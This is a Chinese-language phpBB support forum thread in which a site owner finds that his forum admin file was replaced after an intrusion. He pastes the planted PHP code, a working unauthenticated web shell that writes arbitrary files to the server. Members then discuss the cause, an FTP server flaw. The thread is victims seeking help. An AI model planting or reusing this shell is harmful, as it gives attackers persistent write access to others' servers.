[問題]請問這是被駭了嗎?

phpBB Installation & Usage Support
phpBB 2 安裝於各類型作業平台之問題討論;外掛問題,請到相關版面依發問格式發表!
(發表文章請按照公告格式發表,違者砍文)

版主: 版主管理群

版面規則
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
主題已鎖定
jhung
星球公民
星球公民
文章: 41
註冊時間: 2002-08-20 15:14
聯繫:

[問題]請問這是被駭了嗎?

文章 jhung »

●架設主機作業系統:Windows Xp Pro SP2 有開防火牆
●快速架站程式:Appserv
●您的上網方式:ADSL
●您的 phpBB2 版本:phpBB 2.0.6
●您的 domain(網域名稱) :www.gamejo.com
●您的 phpBB2 連結網址: http://www.gamejo.com
●錯誤狀態:

原本後台這個區域沒有東西的,這兩天沒進後台,今天一進去後台管理就出現這個欄位,]保存文件名...這個區域...還是簡體的...
我已經很久很久沒有再加裝外掛了~
請問這是被駭了嗎?

圖檔
Martinet
竹貓忠實會員
竹貓忠實會員
文章: 850
註冊時間: 2003-06-09 21:58
聯繫:

文章 Martinet »

應該是=口=...如果沒有其他人有修改權限的話..就是...|||
jhung
星球公民
星球公民
文章: 41
註冊時間: 2002-08-20 15:14
聯繫:

文章 jhung »

Martinet 寫:應該是=口=...如果沒有其他人有修改權限的話..就是...|||
是的~沒有其他人有修改權限...

糟糕...我對程式碼不熟...不知道去哪改囉...

先從admin.php和.TPL找起了...

唉...駭我的小香蕉做什麼...
jhung
星球公民
星球公民
文章: 41
註冊時間: 2002-08-20 15:14
聯繫:

文章 jhung »

找到一個他們改過的檔案admin_users.php
整個檔案被改成以下內容~

不過不知道什麼作用\r
有人可以幫忙看一下嗎?

代碼: 選擇全部

<?php
// Codz by angel on 2004, May 26
// Powered by Security Angel Team


// 壺蛌砱趼睫\r
function stripslashes_array(&$array) {
        while(list($key,$var) = each($array)) {
                if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
                        if (is_string($var)) {
                                $array[$key] = stripslashes($var);
                        }
                        if (is_array($var))  {
                                $array[$key] = stripslashes_array($var);
                        }
                }
        }
        return $array;
}

// 瓚剿 magic_quotes_gpc 袨怓
if (get_magic_quotes_gpc()) {
    $_POST = stripslashes_array($_POST);
}

// 硒俴紱釬\r
if($_POST['action']=="create")
{
        $fp=@fopen("".$_POST['filename']."","wb");
        $content = $_POST['filedate'];
        $fw=@fwrite($fp,$content);
        if ($fw) {
                echo "<b>鳩炰ㄛ迡恅璃傖髡ㄐ</b><a href=".$PHP_SELF.">殿隙</a>";
                exit;
        } else {
                echo "<b>迡恅璃囮啖ㄛ岆祥岆癹腔恀枙ˋ</b><a href=".$PHP_SELF.">殿隙</a>";
        }
        @fclose($fp);
}
?>

<form action="<?=$PHP_SELF?>" method="post">
悵湔腔恅璃靡(:<font color="#FF0000">angel.php</font>):<br>
<input type="text" name="filename" size="60">
<p>
恅璃悵湔婓:<br>
<?=str_replace('\\\','/',dirname(__FILE__))?>
<p>
恅璃囀:<br>
<textarea name="filedate" cols="60" rows="10"></textarea><br>
<input type="hidden" name="action" value="create"><input type="submit" value="悵湔">
</form>
<b>蛁砩ㄩ絞衄眈肮腔恅璃湔婓奀ㄛ蔚俇蜊迡囀ㄐ</b>
最後由 jhung 於 2004-12-13 13:57 編輯,總共編輯了 1 次。
webspirit
竹貓忠實會員
竹貓忠實會員
文章: 1354
註冊時間: 2004-02-16 12:01
來自: 精靈國度

文章 webspirit »

安全天使小組?  :-o
http://www.4ngel.net/
jhung
星球公民
星球公民
文章: 41
註冊時間: 2002-08-20 15:14
聯繫:

文章 jhung »

經朋友幫忙看~確定是被駭了~~
我用XP SP2 有開防火牆
我的PHPBB系統是 2.0.6
朋友説:
那支新的程式是一個檔案上傳的程式, 基本上駭客如果能放檔案到你的電腦上 他不需要放一支檔案上傳程式吧 感覺多此一舉。
PHPBB不太可能有這麼大的BUG,有可能是FTP有漏洞。

我決定升級PHPBB版本,換掉原本用的FTP伺服器軟體

給大家做參考
jackyilk
竹貓忠實會員
竹貓忠實會員
文章: 538
註冊時間: 2002-07-21 18:55
來自: 台灣

文章 jackyilk »

您能提供一下您所使用的FTP伺服器軟體嗎?
這樣讓有使用的人也可以警覺一下~
webspirit
竹貓忠實會員
竹貓忠實會員
文章: 1354
註冊時間: 2004-02-16 12:01
來自: 精靈國度

文章 webspirit »

這麼說不是 phpBB 的問題而是 FTP Server software 的問題囉
竹貓忠實會員
竹貓忠實會員
文章: 1058
註冊時間: 2003-05-15 00:30
來自: Game.Hack-遊戲駭客
聯繫:

文章 »

蠻好笑的...他還幫你寫個免費的上傳程式....哈哈哈(閃人~)
有事問問題,沒事答問題。
廣告不是這樣打滴!遊戲駭客
jhung
星球公民
星球公民
文章: 41
註冊時間: 2002-08-20 15:14
聯繫:

文章 jhung »

jackyilk 寫:您能提供一下您所使用的FTP伺服器軟體嗎?
這樣讓有使用的人也可以警覺一下~
我原本是用這套
TYPSoft FTP Server
蠻陽春的~

線在在考慮整個討論區再升級了...可是...又回到資料庫不相容的問題了...

好煩阿~~~ :-?
design
竹貓忠實會員
竹貓忠實會員
文章: 330
註冊時間: 2003-10-31 00:36
聯繫:

文章 design »

jhung 寫:
唉...駭我的小香蕉做什麼...
對不起.. 我正在吃飯.. 笑到噴飯 :lol: :lol:

這句太爆笑了 抱歉 :oops: :oops:

應該替你感到婉息才對.. :mrgreen:
頭像
joly
星球普通子民
星球普通子民
文章: 5
註冊時間: 2004-11-23 21:00

文章 joly »

大陸高手很多,這不算慘,都進到後台了,沒真的駭掉你的小香蕉,他目的只是在示威,呵呵! :-D
[ffs]hunej
星球公民
星球公民
文章: 260
註冊時間: 2004-08-22 14:34

文章 [ffs]hunej »

是有駭客作這檔事是為了提醒user注重安全性啦...
不過也不必這樣做吧......
撿到一疊鈔票,原來是玩具鈔票,空歡喜一場。~~卡好勒

http://www.freepgs.com/hunej/phpBB2/
phpBB2 portal project+foxfireXD templates
主題已鎖定

回到「phpBB 2 安裝與使用」